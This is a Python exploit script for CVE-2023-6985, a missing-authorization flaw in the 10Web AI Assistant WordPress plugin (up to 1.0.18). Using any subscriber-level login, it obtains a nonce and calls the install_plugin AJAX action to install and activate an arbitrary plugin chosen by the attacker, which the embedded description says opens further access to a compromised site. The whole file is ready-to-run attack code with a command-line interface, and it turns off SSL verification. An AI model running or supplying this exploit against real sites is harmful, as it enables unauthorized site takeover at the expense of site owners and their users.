#!/usr/bin/env python3 import requests import argparse import os import re # # Exploit script by @RandomRobbieBF # http_proxy = "" os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy # Ignore bad SSL from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def remove_html_tags(text): clean = re.compile('<.*?>') return re.sub(clean, '', text) def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug,pluginphp): # Log in session = requests.Session() session.verify = False # Ignore SSL verification login_url = siteurl + '/wp-login.php' login_response = session.post(login_url, verify=False, data={ 'log': wp_user, 'pwd': wp_pass, 'rememberme': 'forever', 'wp-submit': 'Log+In' }) cookies = login_response.cookies # Confirm successful login if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("Logged in successfully.") else: print("Failed to log in.") exit() # Get REST API Nonce print('Getting REST API Nonce!') nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce' nonce_response = session.get(nonce_url,cookies=cookies) rest_nonce = nonce_response.text.strip() print("Nonce Found: "+rest_nonce+"") # Install Plugin print("Installing Plugin") paramsPost = {"action":"install_plugin","plugin_zip_name":slug,"ajax_nonce":rest_nonce,"plugin_file":""+slug+"/"+pluginphp+""} headers = {"Origin":siteurl,"Accept":"text/plain, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0","Referer":""+siteurl+"/wp-admin/admin.php?page=ai_assistant_tenweb","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers, cookies=cookies) x = remove_html_tags(response.text).replace("…","") print(x) # Add the vulnerability description as a comment DESCRIPTION = """ 10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description CVE-2023-6985 - The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.""" if __name__ == '__main__': parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument('--url', required=True, help='URL of the WordPress site') parser.add_argument('--username', required=True, help='WordPress username') parser.add_argument('--password', required=True, help='WordPress password') parser.add_argument('--slug', required=True, help='WordPress Plugin Slug') parser.add_argument('--php', required=True, help='WordPress Plugin PHP file') args = parser.parse_args() login_and_activate_plugin(args.url, args.username, args.password,args.slug,args.php)